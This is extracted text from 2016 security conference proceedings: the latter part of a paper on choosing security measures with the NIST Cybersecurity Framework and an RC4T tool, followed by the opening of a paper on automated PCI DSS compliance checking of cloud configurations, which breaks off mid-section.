Improvements
Communication

Figure 2. Categories of Core (created according to


reference [4]).

2.2 Framework Implementation Tiers


The
framework
implementation
tiers
(hereinafter referred to as Tiers) has four
stages, or four tiers, of the risk management
processes of an organization. As the Tier
number increases from Tier 1 to Tier 4, the
adaptedness of the state increases (Fig. 3).

evaluate the gap by comparing the Profile of the


current state and the target state.
3 USE CASE
CORPORATION

of

CSF

by

INTEL

Intel Corporation carried out a pilot project to


verify the usefulness of the CSF.
3.1 Groups in the Pilot Project
The following three groups were formed in the
pilot project.
(1) Core Group
The Core Group consists of 8-10 engineers
with knowledge of advanced information
security. The Core Group has the authority
to select and edit Categories and to set
targets. In this paper, the Core Group
includes the chief information security
officer (CISO).
(2) Individual Security Subject Matter Experts
(SMEs)
The SMEs have the authority to evaluate
the risks in their specialized area. In this
paper, the SMEs are administrators.
(3) Stakeholders and Decision Makers
Stakeholders and decision makers have the
authority to evaluate a target, review the
result of the evaluation, and set the
acceptable risk. In this paper, stakeholders
and decision makers, except the CISO, are
executives.
3.2 Policy of Pilot Project

Figure 3. Adaptedness of Tiers.

2.3 Framework Profile


The framework profile (hereinafter referred to
as Profile) is a summary of Categories and
Subcategories excerpted from the requirements
of an organization. If the organization sets the
Profile of its own target, the organization can

ISBN: 978-1-941968-37-6 2016 SDIWC

In the pilot project, Subcategories were


excluded for simplification and instead,
Categories were enriched. In addition, specific
definitions of each Tier were set and listed in a
table. Then, the definitions were used as an
index for evaluation by the Tier (Table. 1).

29

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Table 1. Example of Tier Definitions (created according


to [5]).
Tier 1
Cybersecurity
professionals
(staff) and the
general
employee
population
have had little
to no
cybersecurity
related
training.

Tier 2
The staff and
employees
have
received
cybersecurity
related
training.

A risk
management
process has
not been
formalized;
risks are
managed in a
reactive, ad
hoc manner.

Prioritization
of
cybersecurity
activities is
informed by
organizationa
l risk
objectives,
the threat
environment,
or mission
requirements
.

Tier 3
The staff
possesses the
knowledge
and skills to
perform their
appointed
roles and
responsibilitie
s.

Consistent risk
management
practices are
formally
approved and
expressed as
policy, and
there is an
organizationwide approach
to manage
cybersecurity
risk.

Tier 4
The staffs
knowledge
and skills are
regularly
reviewed for
currency and
applicability
and new
skills, and
knowledge
needs are
identified and
addressed.
Cybersecurity
risk
management
is an integral
part of the
organizational
culture.

Moreover, an administrator evaluated the value


of each Tier for the risk assessment of each
Category. By comparing the current state and
the target state, a heat map was created by
emphasizing the lower value of the Tier with a
red color (Fig. 4). Here, the heat map would be
a Profile in the pilot project.

(3) CISO and the administrators analyze the


result of the evaluation.
(4) CISO and the administrators communicate
with executives by using the analysis result.
By taking these actions, the Intel Corporation
obtained the effects, discussed information
security within the company, and more easily
explained the current state to stakeholders.
4 RELATED WORK
Another example of a CSF application was
reported at the University of Chicago [5]. They
conducted a comparative study of current states
and targets by inputting values of 0 to 4 derived
from ISO 15504 in each Category.
Related research to obtain a consensus of
measures with executives lead to development
of a system called the Multiple Risk
Communicator (MRC) [6]. This system outputs
the optimal combination of measures by
inputting the quantitative effect of each
measure and the constraints as a cost and an
objective function. With MRC, we can obtain
the optimal combination of measures under the
constraints set by the executives. Therefore, we
find that the MRC is effective for building
consensus to select measures.
5 PROPOSED METHOD to ENUMERATE
and SELECT MEASURES

Figure 4. Example of heat map (created according to [5]).

3.3 Process and Effect of Pilot Project


The pilot project was continued for seven
months and followed the flow from (1) to (4)
below by introducing the definitions of Tiers
and the threat map.
(1) CISO sets the target of the Tier for each
Category.
(2) The administrators evaluate the current state.

ISBN: 978-1-941968-37-6 2016 SDIWC

The CSF only compare the current state and the


target state. Therefore, a method to enumerate
and select measures for evolving the current
state to the target state is required.
Applications and discussions related to the CSF
have been studied. However, we could not find
research and applications that consider the
measures to approximate the current and target
states.
In the MRC, building consensus of information
security with the executives has been difficult
in the environment of insufficient mutual
understanding
between
executives
and
administrators, because consensus using the
MRC needs executives who have enough

30

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

knowledge of information security and enough


time [7].
5.1 Process for Using CSF between
Executives and Administrators
Accordingly, the authors propose processes for
using the CSF, as shown in Fig. 5. The
processes were proposed to enumerate
measures and selecting the optimal combination
of measures for obtaining mutual understanding
between executives and administrators. The
following steps show the descriptions of (1) to
(8) in Fig. 5.
(1) The CISO is included in the Core Group
input Categories and Tier definition in the
system for agreement with executives.
(2) Administrators input the current state of
his/her related area in each Category in the
system.
(3) The system shows the current state in
Profile form to executives and the CISO.
(4) The executives and the CISO understand
the current state from the Profile. In
addition, they set the target of the Tier in
each Category. They also show the
acceptable total cost for measures.
(5) The CISO and administrators understand
the range of necessary measures by using
the information from the system.
(6) The CISO and administrators have a
meeting to enumerate the measures. Then,
they input the measures, the measures cost
and the measures effect on the system, as
shown in Fig. 6.
(7) The system computes and shows the
optimal combination of measures at the
acceptable cost to minimize the gap
between the target and current states for
executives and the CISO, as in the MRC. It
is possible to provide the system with a
function to set measures that should always
be adopted in the computation, because the
executives might order some measures to
be adopted.
(8) If executives and the CISO are satisfied
with the total cost and state for carrying out

ISBN: 978-1-941968-37-6 2016 SDIWC

measures, the combination of measures


will be adopted and carried out. If the
executives and the CISO are not satisfied,
the system returns to step (6) to come up
with a new acceptable cost and Categories
to close the gap.

Figure 5. Process of using CSF for executives, the CISO


and administrators.

5.2 Method of Enumerating Measures


The authors defined that Tier 1 is a state that
does not fit into any other Tier. We also defined
that each Tier can be fulfilled only when all
definitions of each Tier are satisfied. In addition,
we set ID each definitions (e.g. 2-1, 3-2). Given
these definitions, we propose a method to find
the effects of measures as target administrators
of measures, target Categories of measures,
definition of Tiers solved by measures [8].
In the table of Tier definitions and measures
shown in Fig. 6, is the range that the
current state fulfills, is the range that a
measure fulfills. We assume the effect of
Measure 3 is Tier definition 3-1 of
Category 1 of Administrator 1 and the
effect of Measure 4 is Tier definition 3-2, 33 of Category 1 of Administrator 1. Then,
Category 1 of Administrator 1 is raised to
Tier 3 by fulfilling all the definitions of Tier 3
while carrying out Measure 3 and Measure
4. Consequently, we can optimize the
combination of measures for minimizing the
gap between the current state and the target
state under the cost constraints.

31

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Figure 6. Table of Tier definitions and measures for


administrator 1.

6 DEVELOPMENT of RC4T (RISK


COMMUNICATOR for TIER)
The authors developed the system named RC4T
(Risk Communicator for Tier) to assist the
process shown in Fig. 5. The RC4T is
developed in Java 8. The total number of steps
of the program is about 2600. The RC4T
prepares the steps of inputting the current state
tool and understanding the current state tool.
The inputting current state tool is used to
input the Tier definition of the current state
given by the administrator.
Understanding the current state tool is used
by executives to understand the current state
based on the data input of inputting current
state tool. In addition, administrators can
enumerate measures by using this tool and
watching the effect of the measures.
For more information about each tool, refer to
[8].

However, replacement is not often successful


due to the lack of communication. Therefore,
we decided to improve the system for an
administrators replacement.
In this trial application, the first author of this
paper acted as the CISO, and the second author,
who is a professor at the laboratory, acted as the
executive.
Table 2 shows the administrators who
participated in this trial application.
Table 2. Administrators for the trial application.
Administrator
ID
PLA

Administrators name

Work

Administrator of
planning

PUB

Administrator of public
relations

CYB

Administrator of
groupware

Planning events
and managing cost
of events.
Managing web
page of the
laboratory.
Managing
groupware of
laboratory.

The trial application was conducted as follows:


(a) The CISO decided the Categories and
definitions of the Tier as shown in (1) of
Fig. 5. Moreover, they set the target of the
Tier in each Category. Tables 3 and 4 show
the Categories and the definitions of Tiers
that were finally decided.
Table 3. Categories used in the trial application.
Functions
Identify

7 TRIAL APPLICATION
7.1 Result of Trial Application
By using the processes shown in Fig. 5, we
showed that executives can enumerate
measures and obtain satisfactory combinations
of measures. A trial application was carried out
in the authors laboratory to confirm this result.
In our laboratory, different work tasks to
maintain operations of the laboratory were
assigned to the students. The leader of each task
is called an administrator. In the university,
members are changed every year. Therefore,
the administrator is replaced every year.

ISBN: 978-1-941968-37-6 2016 SDIWC

Category
ID
ID.AM
ID.BE
ID.RA

Protect

Respond

PR.AC
PR.AT
PR.DS
RS.IM

Category
Asset
management
Business
environment
Risk
assessment
Access control
Awareness /
Training
Data security
Improvement

Evaluation
of executive
2

Tar
get
3

3
3

3
4

3
2

3
3

Table 4. Tier definitions used in the trial application.


Tier Definition Explanation of definition
ID
2
2-1
We identified information that
should be given to replacement
student about this category.
2-2
We understand the risk and
damage when this category is
impaired.

32

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

3-1
3-2
3-3

4-1
4-2
4-3

Taking over for this category is


carried out accurately and
smoothly by documentation.
We have knowledge, skill and
assets to fulfill the responsibility
of this category.
We defined policy to manage the
risk of this category.
Our current organization can
improve the subject of
replacement.
We learn and respond of ones
own accord about this category.
Risk management of this
category is the policy of our
laboratory.

Then, the CISO inputted the Categories and


Tier definitions to the RC4T.
(b) The CISO asked administrators to set the
subjective Tier value for evaluations of each
Category, as shown in (2) of Fig. 5. Then,
the administrators inputted the Tier
definitions that fulfilled in current state to
the RC4T. After this, RC4T calculated Tier
value based on Tier definitions that were
inputted.
(c) The inputted result was shown to the CISO
and executives by using the RC4T, as
shown in Fig. 7. This process is (3) in Fig. 5.

acceptable total cost for the measures. Here,


the time to execute the measure was used as
the cost. The total time given as a constraint
was 10 hours.
(e) The CISO and the administrators
enumerated the measures and estimated the
cost and the effect of improving the Tier
(see Table 5) as shown in (5), (6) and (7) in
Fig. 5. Here, considering the risk gap
between the current state and the target state,
the CISO and the executives thought that
the
measures
of
Awareness
/
Training, Risk Assessment and Asset
Management should be carried out. Table
5 shows the list of measures.
Table 5. List of measures.
Measure
ID

Measure
name

M01

Organize
information
related to the
takeover
Short course
for the
awareness and
takeover
Short course
for asset
management
To include
information
about risk
assessment to
information of
the takeover.
Documentatio
n of
information of
the takeover

M02

M03
M04

M05

M06

Figure 7. Inputted result.

(d) The executives and the CISO understood


the current state by the Profile as shown in
Fig. 7, as shown in (4) of Fig. 5. The
executive ordered the CISO and the
administrators to enumerate the measures
for the Tiers that have a gap between the
current state and the target state. In addition,
the administrators needed to show an

ISBN: 978-1-941968-37-6 2016 SDIWC

M07

M08

M09

Admin
istrato
r ID
PUB

Categ
ory ID

Tier
definit
ion ID
2-1

Cost
(hour
)
0.5

PUB
CYB

PR.A
T

2-2
3-1

CYB

ID.A
M

2-2
3-1

PUB
CYB

ID.RA

2-1
2-2
3-2

PLA
PUB
CYB

PR.A
T
ID.A
M
ID.RA
PR.A
T

2-1
3-1

3-2

PR.A
T
ID.A
M
ID.RA
PR.A
C

3-3

0.5

3-1
3-2
3-3

PR.A
T

4-1

Improve the
takeover in
response to
the risk
To include
risk
management
in policy

PLA
PUB

Meeting for
dividing
administrative
account in
administrator
of public
relation
Make
processes for
improvement

PUB

PLA
PUB
CYB

PLA
PUB
CYB

PR.A
T

33

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

M10

M11

of takeover
Establish a
system to
perform a
regular
knowledge
confirmation
Make policies
for takeover in
the laboratory
with executive
layer

PLA
CYB

PR.A
T

4-2

PLA
PUB
CYB

PR.A
T

3-3
4-3

The system computed the optimal


combination of measures that minimized
the gap between the current state and the
target state under the cost constraint. The
calculated result showed that the
combination of M01 to M08 was optimal.
(f) The executives who knew the result from
the display of the RC4T ordered the CISO
to implement the measures, as shown in (8)
of Fig. 5.

the CSF. In addition, we developed a system


called RC4T to support the method and applied
it to a small practical problem. With the RC4T,
the executive can know the optimized measures
to fulfill the gap between the current state and
the target state at an acceptable cost. Therefore,
we validated that the proposed processes can
assist the consensus of measures between
executives and administrators.
In future work, we would like to propose a
method to change the requirements of
Categories and Tier definitions more easily.
REFERENCES
[1]

Ministry of Economy, Trade and Industry,


Guidance for introduction of information security
governance (in Japanese), pp. 1-64, June 2009.

[2]

K. Hayashi, From the chief security to president


security:
Japanese-style
management
and
information security (in Japanese), Information
Security Science, no.2, pp. 1-42, Nov 2010.

[3]

National Institute of Standards and Technology


(NIST), Framework for Improving Critical
Infrastructure Cybersecurity version 1.0, pp. 1-43,
Feb 2014.

[4]

T. Casey, K. Fiftal, K. Landfield, J. Miller, D.


Morgan, and B. Willis, The Cybersecurity
Framework in Action: An Intel Use Case, Intel
Corporation, pp. 1-10, 2015.

[5]

University of Chicago Biological Sciences


Division, G2 Inc. Applying the Cybersecurity
Framework at the University of Chicago An
Education Case Study, University of Chicago, pp.
1-5, Apr 2016.

[6]

R. Sasaki, Y. Hidaka, T. Moriya, K. Taniyama, H.


Yajima, K. Yaegashi, Y. Kawashima and H.
Yoshiura, Development and Applications of
Multiple Risk Communicator, Transactions of
Information Processing Society of Japan, vol. 49, no.
9, pp. 3180-3190, Sep 2008.

[7]

M. Taniyama, Y. Hidaka, M. Arai, S. Kai, H. Igawa,


H. Yajima and R. Sasaki, Application of "multiple
risk communicator" to the personal information
leakage problem in the enterprise, Japan society of
security management journal, vol. 23, no. 2, pp. 3451, Sep 2009.

[8]

S. Fukushima and R. Sasaki, Proposal of the


method for establishing the consensus on the
measures based on Cybersecurity-Framework,
DICOMO 2016, pp. 1699-1704, July 2016.

7.2 Considerations of Trial Application


We were able to obtain the combinations of
measures that minimized the gap between the
current state and the target state. We judge the
proposed method and RC4T to be useful for
easily performing risk communications related
to the selection of measures between the
executives and the CISO. Namely, the
executives and the administrators can easily
obtain a consensus of measures through the
CISO by the proposed process shown in Fig. 5.
In addition, in the steps of the organization
requirement, we found that changing the
requirements for Categories and Tier
definitions is difficult. Thus, future challenges
are to propose a method to easily change
requirements of Categories and Tier definitions.
8 CONCLUSION
In this paper, we proposed a method of
enumeration measures to select the optimal
combination of measures for reaching the target
state of a Tier. Our example implementation
was based on Intel Corporations use case of

ISBN: 978-1-941968-37-6 2016 SDIWC

34

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Development and Evaluation of a Dynamic Security Evaluation System


for the Cloud System Operation
Motoharu SEKINE1 , Yuki ASHINO2 , Shigeyoshi SHIMA3
Yoshimi TESHIGAWARA1 and Ryoichi SASAKI1
1
Tokyo Denki University
5 Senju asahi-cho, Adachi-ku, Tokyo 120-8551 Japan
2
Platform Service Divisions, NEC Corporation
1753 Shimonumabe, Nakahara-ku, Kawasaki, Kanagawa 211-8666
3
Security Laboratories, NEC Corporation
1753 Shimonumabe, Nakahara-ku, Kawasaki, Kanagawa 211-8666
[email protected]

ABSTRACT
Because of todays sophisticated cyberattacks, IT
systems are required to take security into special
consideration from the design stage to the
operational stage. Therefore, industry organizations
as well as governments recommend that IT systems
comply with the security standards. It is necessary
for the system operator of an IT system to
comprehend these security standards and to verify
that specific security functions for the proper system
configuration are selected and implemented
appropriately. The operator is expected to perform
corresponding work for the cloud system, where the
system configuration can be changed flexibly and
quickly when necessary. However, the verification
method of security functions based on the security
standards depends on the system configuration.
Because each of the flexible changes of the cloud
system configuration needs specific security
functions and verification of installations, it is
difficult for the system operator to take full
advantage of the cloud infrastructure and it may
result in burden of the system operator. Therefore,
in order to maintain security functions by taking
advantage of the cloud infrastructure, we propose a
security evaluation method to verify security
functions automatically based on the modeled
system configuration and the security standards by
tracking the log analysis of an IT system in
operation constructed on the cloud infrastructure.
We developed a support tool to ensure that the
system complies with the security standard.
Moreover, we show the effectiveness of the

ISBN: 978-1-941968-37-6 2016 SDIWC

proposed method by an experimental evaluation on


the cloud infrastructure.

KEYWORDS
Operation Support, Log Analysis, Security
Evaluation, Security Standard, Cloud System,
System Configuration

1 INTRODUCTION
Because of the todays sophisticated
cyberattacks, IT systems are required to take
security into special consideration from the
design stage to the operational stage. Therefore,
industry organizations as well as governments
recommend that IT systems comply with the
security standards [1].
In the design stage, the tools that ensure the IT
system is based on security standards have been
discussed [2], but the standards must also be
ensured in the operation stage. Therefore, it is
necessary for the system operator of the IT
system to comprehend these security standards
and to verify that the specific security functions
selected are based on the security standards and
implemented for proper system configuration
The system configuration is composed of an
applications configuration in a machine
(machine configuration) and placement of the
machine in the IT system (network
configuration). However, in order to correspond

35

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

various IT systems, the security standards are


generic. Unless standards can be written to
correspond to specific system configurations, it
is difficult to verify based on the security
standard that the specific security functions are
installed for proper system configuration
(security evaluation).
In addition, an IT system constructed on the
cloud (cloud infrastructure) that provides IT
system infrastructure includes a virtual resource
such as virtual machine and network interface.
The cloud system is now in widespread use and
is expected to continue to grow. Thus, security
standards for the cloud are in demand.
However, the following problems exist for
cloud systems. The cloud infrastructure has the
advantage that it can change the network
configuration by adding a virtual machine or a
network interface as needed for the virtual
technology. For example, a road balancer
detects an increase in server load and
distributes the load by adding a virtual machine
automatically. A new security problem can
occur due to the change of the system
configuration, even if it is based on the security
standard in the design stage. The system
configuration change may be one that the
system operator does not intend in the operation
stage. Therefore, it is necessary to execute a
security evaluation by tracing the change of the
system configuration and analyzing the current
system configuration as it changes. Thus, the
cloud can possibly be operated based on the
security standard, but it takes much time and
effort by the system operator. This means that it
is impossible to take total advantage of the
cloud infrastructure.
To maintain proper security functions, we
previously proposed a security evaluation
method [3]. In this paper, we developed a
support tool for flexible operation to take
advantage of the cloud infrastructure and we
apply this in the Cloud infrastructure. This
paper is organized as follows. In Section 2, we
describe related methods and tools. In Section 3,
we describe the security evaluation method
proposed. In Section 4, we describe the

ISBN: 978-1-941968-37-6 2016 SDIWC

development of a prototype for implementing


our security evaluation method. Finally, in
Sections 5 and 6, we discuss our experimental
evaluation and our intended future work.
2 RELATED METHODS AND TOOLS
To maintain security functions from the design
stage to the operation stage, it is necessary to
take appropriate security measures at each stage
of the IT system development life cycle.
Related researches can be classified into the
following two categories.
One comprises the methods and tools to
evaluate IT system configuration in the design
stage. The other comprises the methods and
tools to monitor IT system operation in the
operation stage.
2.1 Evaluating of IT system configuration
The IT system is evaluated from the viewpoint
of security policy in the design stage by using a
model (evaluation model) to evaluate the
security functions. Our previous study proposed
an evaluation model for evaluation of the
strength of the cloud system [4] and an
evaluation model to mitigate the major risks on
the cloud system [5]. These models can
evaluate based on the basic policy (security
requirement) of the countermeasures required
for the IT system. In particular, it is effective to
use the evaluation model to build the IT system
in the design stage. However, because the
evaluation can be made at any time as required,
the IT system cannot be guaranteed whether the
evaluation model represents the design or the
operation stage. In this paper, we can evaluate
security by tracking the change of the system
configuration with the evaluation model.
Therefore, a system can guarantee the IT
system is based on the security standard from
the design stage to the operation stage. As an
example, the Amazon Inspector evaluates
automatically the appropriateness of the IT
system on the basis of knowledge and best
practices by the Amazon Web Services (AWS)

36

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

team [6]. This tool, which uses the same


method as our proposed method, evaluates the
machine configuration. However, our major
difference from the Amazon Inspector is the
ability to evaluate the network configuration as
well as the machine configuration.
2.2 Monitoring of IT system operation
To evaluate IT system security functions in the
operation stage, the system operator monitors
the system operation by managing and
analyzing the operational logs. This approach
aids the detection of insider threats by
analyzing the logs [7] and the management
system to streamline security monitoring and
auditing [8][9]. Moreover, security information
and event management (SIEM) has attracted
attention as a tool of IT system operation and
management. The SIEM can inform the
administrator of an abnormality by analyzing
logs collected from servers, network interfaces,
and applications. The SIEM is expected not
only to respond after the problem has occurred
but also to discover the symptoms of an attack.
Some tools already incorporate the SIEM
mechanism [10][11]. These methods and tools
can respond only to local problems in the
machines where logs are analyzed in real time,
and so it is difficult to evaluate the whole
configuration. In this paper, we evaluate the
whole system configuration to prevent attacks.
To conduct the evaluation, we use the logs to
analyze changes in the system configuration.

Requirement 1: Clarification of security


evaluation that does not depend on the user
For a cloud system that has security functions
based on security standards, it is necessary to
verify the suitable system configuration for the
evaluation model in the design stage and to
build the cloud system on the basis of this
design. On the other hand, in the operation
stage, security is evaluated as to whether the
system configuration of the current cloud
system is appropriate for the evaluation model
to maintain security functions. If the system
operator takes advantage of the cloud system
infrastructure, where the system configuration
can be changed easily, the current system
configuration may change from the system
configuration of the design stage. Therefore, the
system operator has to know the system
configuration after the configuration change.
The operator
determines
the
system
configuration by analysis. However, the
analysis could possibly be different because the
knowledge of each system operator varies. If
the analysis is not properly executed, the
security evaluation is incorrect. It is necessary
to generate a system configuration that does not
depend on the knowledge of the system
operator in the operation stage in order to
evaluate the security accurately.
Requirement 2: Tracking system
configuration change
The cloud infrastructure has the advantage that the

2.3 Challenges of the existing methods and


tools
The following three requirements of the
existing methods and tools described in 2.1 and
2.2 are intended to maintain the security
functions of the cloud system from the design
stage to the operation stage.

ISBN: 978-1-941968-37-6 2016 SDIWC

system configuration changes easily in the operation


stage. Therefore, deficiencies of the new security
measures can possibly occur with the change of
system configuration. An evaluation to maintain
security functions is needed every time when the
system
configuration
changes.
However,
conventional security evaluation methods are
assumed to be used only in the design stage. In this
case, the system operator cannot make an evaluation
by tracking the changes of the system configuration
in the operation stage. Therefore, the system
operator needs to make an evaluation at an arbitrary
time. Because the system configuration often

37

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

changes, the system operator needs to evaluate the


timing more often. Maintaining the security
functions by taking advantage of the cloud
infrastructure takes unnecessary time and effort by
the system operator. To reduce this extra time and
effort, it is desirable to evaluate immediately after
the system configuration changes only. Thus, it is
necessary to track the change of the system
configuration, and to detect the machine
configuration and the network configuration where
the elements of the system configuration change
exist.
Requirement 3: Automation of security
evaluation

The conventional security evaluation is based


on the premise of a correctly designed model of
the security standard as the evaluation criteria
and the system configuration as the evaluation
target. The cloud system easily builds a
complex IT system on a large scale. It is
expected that the system operator will analyze
the system configuration in order to create a
precise model. Therefore, it is necessary to
execute the security evaluation automatically as
much as possible to reduce the burden on the
system operator.
3 PROPOSED METHOD
3. 1 Method for satisfying requirements
To maintain cloud security functions, we focus
on the methods described below.
Method 1: Evaluation based on modelling
(requirement 1)
To avoid an analysis of the system
configuration that depends on the knowledge of
the system operator, we provide a reference
model for system configuration (system
configuration model). The system configuration
model is based on the Common Information
Model (CIM) created by the Distributed
Management Task Force (DMTF). The model
represents the relevance among multiple objects

ISBN: 978-1-941968-37-6 2016 SDIWC

such as machines or applications on the system


configuration [12]. In this study, we analyze the
system configuration based on this system
configuration model, which represents the
connections among virtual machines and their
roles.
Method 2: Detection of the system
configuration changes (requirement 2)
For evaluating the security in association with
the system configuration changes, it is
necessary to track the system configuration
changes by detecting them. To do this, we
apply the following two methods using
monitoring machines and the network
configuration. We explain the details below.
(a) Detection of machine configuration
changes
By monitoring a virtual machine, tracking the
system configuration changes is executed. The
method analyzes a log outputted when a system
setting is changed. This log includes various
machine activity records, such as launching
applications and logging in by the machine user.
We read the application activity changes in the
log and detect the configuration changes inside
the machine.
(b) Detection of network configuration
changes
To track added or deleted machines in a virtual
machine, we use an Application Programming
Interface (API) that manages network
configuration changes, such as adding or
deleting machines and changing the cloud
configuration. A virtual machine is deployed on
the cloud platform constructed by the host
machines. Therefore, by reading the setting of
the cloud platform from the host machines, it is
possible to analyze the connection among
virtual machines. By monitoring this setting,
we can detect the network configuration
changes.

38

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Method 3: Systematization of security


evaluation (requirement 3)
To reduce the system operators work in the
cloud security evaluation, the evaluation should
be made automatically. Therefore, by applying
the system configuration model with each
machine configuration to the evaluation model,
the security function settings are checked to
determine if they are appropriate. To collect the
application data for the machine configuration,
agents are deployed for the analysis. The
applications in the machine run based on the
setting files. Therefore, by reading the setting
files and extracting the necessary evaluation
data, such as the machine IP address or the port
number that the application uses, the machine
configuration to be the basic data for the
machine configuration model is obtained. Then,
by aggregating the machine configurations
obtained from each machine, the system
configuration model is made. By applying this
aggregated model to the evaluation model, we
can evaluate the security in the cloud
automatically.
3.2 Outline of the proposed method
To maintain the cloud system, we developed a
system named System Design Checker.

data of the virtual machine such as A or B in


the cloud system from the management tool
(OSSEC), which is an open source host-based
detection system, to the system operators
machine and aggregating the collected data.
Then, in the operation in method 2, the change
is identified by tracking the changes of the
cloud system configuration. A detected change
of the machine configuration is a trigger for a
security
evaluation.
If
the
network
configuration is changed, it is reported if the
machine detected is considered to be an
exception, because it is possible for the system
operator to make a mistake, and the appropriate
virtual machine data are sent to the operator
machine. In method 3, the system configuration
model is built by reading the setting file data
from the Model Generator (MG) set in each
virtual machine and aggregating these data in
the MG of the operator machine. Finally, a
security evaluation is made and reported to the
system operator by using the Knowledge
Verifier (KV) that corresponds to this system
configuration model and the evaluation model
defining the detail security functions based on
the security requirements of the security
standard. We describe OSSEC, MG, and KV in
detail later in this paper.
4 PROTOTYPE DEVELOPMENT
In this section, we describe the implementation
described in Section 3. In 4.1 we show the
environment for installing the proposed method
shown in 3.2. In 4.2 we show the
implementation of the proposed method.
4.1 Environment to be built

Figure 1 Security evaluation process


In method 1, the current system configuration
model is made by collecting and sending the

ISBN: 978-1-941968-37-6 2016 SDIWC

We create the environment for security


evaluation even if the system configuration is
changed, such as the change of the application
setting in the virtual machine and/or the change
of the virtual machine deployment to make
multiple virtual machines on the cloud platform.
In this system, we use the Payment Card
Industry Data Security Standard (PIC DSS),

39

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

developed by financial institutions for a


security standard model. PCI DSS is assumed
to be provided for web systems in the virtual
environment, and so this is a suitable security
standard for the cloud system. We build up the
web system configuration to evaluate the PCI
DSS.
To create this web system, we use Hyper-V 6.2.
Hyper-V, which is the virtual system provided
by Microsoft and is free for use with Windows
Server 2008 64 bit or Windows 8.0 OS. Similar
applications are available, but they come with a
cost. That is the reason why Hyper-V has a high
market share in this field. The hardware
supporting Hyper-V is similar to a cloud
platform, and in this hardware we construct the
web system deploying virtual machines and
virtual switches shown in Figure 2.

Figure 2 Web system deployed on the Hyper-V


We set the web server in the demilitarized zone
(DMZ) and the database (DB) server in the
inside network. Also, we set a management
server to access the outside network and to
work as a router managing the virtual machine.
On each virtual machine, we block the access
by the firewall (FW) except at designated port
numbers to connect to other virtual machines.
The virtual machine connected to the virtual
switch allows the network interface (NI) to
connect to the network belonging to that virtual

ISBN: 978-1-941968-37-6 2016 SDIWC

switch, then it communicates to the outside


network through the virtual switch of the
Internet. We create the web system with these
minimum possible functions to evaluate the
security based on the PCI DSS.
As a prerequisite, all virtual machine OSs and
applications are unified among the virtual
machines
under
the
OS
named
Ubuntu14.04LTS. Based on this OS, we make a
template having the application for evaluating
the security. Two types of templates are used.
One is for the agent to use and the other is for
the manager to manage the virtual machine and
to get the result of the security evaluation. In
this web system, the management server has the
manager functions. The system operator makes
virtual machines that have the role of web
server by installing applications such as Apache
based on the above templates. The
configuration is shown in Table 1.
Table 1 Structure of the servers template
Application name
Use of the application
OpenSSH_5.6p1
Manage virtual machine
OSSEC-HIDS-2.8.1 Take data in virtual
machines
iptables 1.4.21
Packet filtering /
transfer
Model Generator
Make the system
configuration model
Knowledge Verifier Evaluate the system
configuration model
(only operator machine)
Apache 2.2.22
Build a web service
(option)
MySQL 14.14
Build a DB (option)
4.2 Implementation of function
Here we show more detailed functions of the
proposed method for evaluating security in the
environment build described in 4.1.

40

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Implementation 1: Function to create the


system configuration model (Method 1)
We create a system configuration model to
evaluate the security based on the PCI DSS
from the web system in operation. To collect
the data of each virtual machine for creating
this system configuration model, we use
OSSEC, which is the one of the open source
software (OSS) tools adapted from the SIEM
system. OSSEC is generally divided into the
manager and the agent. The agent installed in
each machine collects the log data and sends it
to the manager. Then the manager analyzes the
received data.
Sending the virtual machine log data from the
OSSEC agent to the manager does not need any
permission to connect to a virtual machine
because only the agent side sends the log data
to the manager. In addition, OSSEC can be
used free of charge and has been commonly
installed in multi-environment PCs. As
because
connecting
mentioned
above,
permission to the virtual machine is not needed
and sophisticated installation is not required,
we adopt the OSSEC model to create the
system configuration based on the log data. The
model of the system configuration is shown in
Table 2.
Table 2 Model of the system configuration
Attribute
Detail of data
Object
Machine
NI (network interface)
Service
Bridge
Web server
SSH (secure shell) server
DB server
FW (firewall)
Parameter
Network zone where NI belongs
Rule of FW filtering
Association Network configuration (relation
between machines)
The system configuration model corresponds to
the PCI DSS security requirements and is

ISBN: 978-1-941968-37-6 2016 SDIWC

written for each virtual machine role, the FW


setting, and the relation between the network
zone deployed and the virtual machine that
collects the data by OSSEC. We evaluate the
security with this system configuration model.
Therefore, if OSSEC cannot recognize a virtual
machine on the web system, the machine is
handled as an irregular machine which is not to
be applied by the System Design Checker.
Implementation 2: Function to detect a
change in system configuration (Method 2)
(a) Detection of a change of machine
configuration
A change of the machine configuration is
detected by analyzing the log. Because OSSEC
can make a log analysis, our system monitors
virtual machines by using OSSEC. Because the
machine configuration is based on the setting of
the applications, we monitor the setting file to
specify the operation of the application and
usage situation of each port based for the
application. If a change occurs, an alert notifies
the system operator. Then, we evaluate the
security by this trigger.
(b) Detection of a change of Network
configuration
When a virtual machine disposition is changed,
the machine that is changed cannot be
recognized immediately by OSSEC and so that
machine is treated as an irregular machine until
OSSEC recognizes it again. The irregular
virtual machine is then identified. Therefore,
the host machine side reads the Hyper-V setting
that is the basis of the web system configuration
and shares the data of the change of the web
system network configuration with the
management server. After sharing, the web
service to provide data of the change on the
host machine is created and the management
machine accesses those data.

41

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Implementation 3: Function to automate


security evaluation (Method 3)
For evaluating security, the analysis of the
system configuration based on the system
configuration model and the collation of the
security requirements of the PCI DSS are
executed. We describe these two functions
below.
(a) Collation with PCI DSS
Evaluation of the security is made
automatically based on the PCI DSS. For this
